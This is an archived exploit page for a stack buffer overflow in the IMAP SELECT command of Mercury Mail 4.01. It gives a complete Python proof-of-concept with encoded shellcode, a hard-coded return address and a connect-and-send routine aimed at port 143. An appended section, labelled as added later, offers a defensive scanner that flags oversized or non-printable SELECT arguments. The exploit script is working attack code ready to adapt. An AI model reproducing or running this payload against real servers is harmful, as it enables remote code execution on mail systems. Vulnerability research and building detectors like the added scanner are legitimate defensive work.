Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit
Source: WWW.WHITEHAT.CO.IL  Author: Muts  Published: 2004-11-30

#########################################################
#
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow
# Discovered by : Muts
# Coded by : Muts
# WWW.WHITEHAT.CO.IL
# Plain vanilla stack overflow in the SELECT command
#
#########################################################


import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Lame calc.exe shellcode - don't expect miracles!

sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"

# Change RET address as needed
buffer = '\x41'*260 + struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2

print "\nSending evil buffer..."
s.connect(('192.168.1.167',143))
s.send('a001 LOGIN ftp ftp' + '\r\n')
data = s.recv(1024)
sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "
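
A defensive counterpart to the script above, added here as an example and not part of the original posting: it scans a reassembled client-to-server IMAP stream and flags SELECT commands whose mailbox argument is oversized or contains non-printable bytes. The 255-byte limit, the function names and the sample stream are assumptions constructed for illustration; IMAP literals ({n}) are not handled.

```python
import re

# Assumption: 255 bytes is a local policy limit, chosen to sit below the
# 260-byte filler that the script above places before the return address.
MAX_MAILBOX_LEN = 255

# "<tag> SELECT <mailbox>" on a single line; DOTALL so stray bytes such as a
# lone \n inside the argument are still captured and measured.
SELECT_RE = re.compile(rb"^\S+ SELECT (.*)$", re.IGNORECASE | re.DOTALL)


def inspect_line(line: bytes):
    """Return a list of findings for one client-to-server IMAP line."""
    m = SELECT_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return []
    arg = m.group(1)
    # Strip one pair of surrounding quotes (quoted-string mailbox names).
    if len(arg) >= 2 and arg.startswith(b'"') and arg.endswith(b'"'):
        arg = arg[1:-1]
    findings = []
    if len(arg) > MAX_MAILBOX_LEN:
        findings.append("oversize mailbox argument (%d bytes)" % len(arg))
    if any(b < 0x20 or b > 0x7E for b in arg):
        findings.append("non-printable bytes in mailbox argument")
    return findings


def scan(stream: bytes):
    """Split a reassembled client stream on CRLF; return (line_no, finding)."""
    alerts = []
    for n, line in enumerate(stream.split(b"\r\n"), 1):
        for finding in inspect_line(line):
            alerts.append((n, finding))
    return alerts


# Constructed sample traffic (benign filler only, not captured data).
SAMPLE = (b"a001 LOGIN user pass\r\n"
          b"a002 SELECT INBOX\r\n"
          b"a003 SELECT " + b"A" * 300 + b"\r\n"
          b'a004 SELECT "Sent Items"\r\n'
          b"a005 select box\xf7\x28\r\n")

if __name__ == "__main__":
    for line_no, finding in scan(SAMPLE):
        print("line %d: %s" % (line_no, finding))
```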



 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved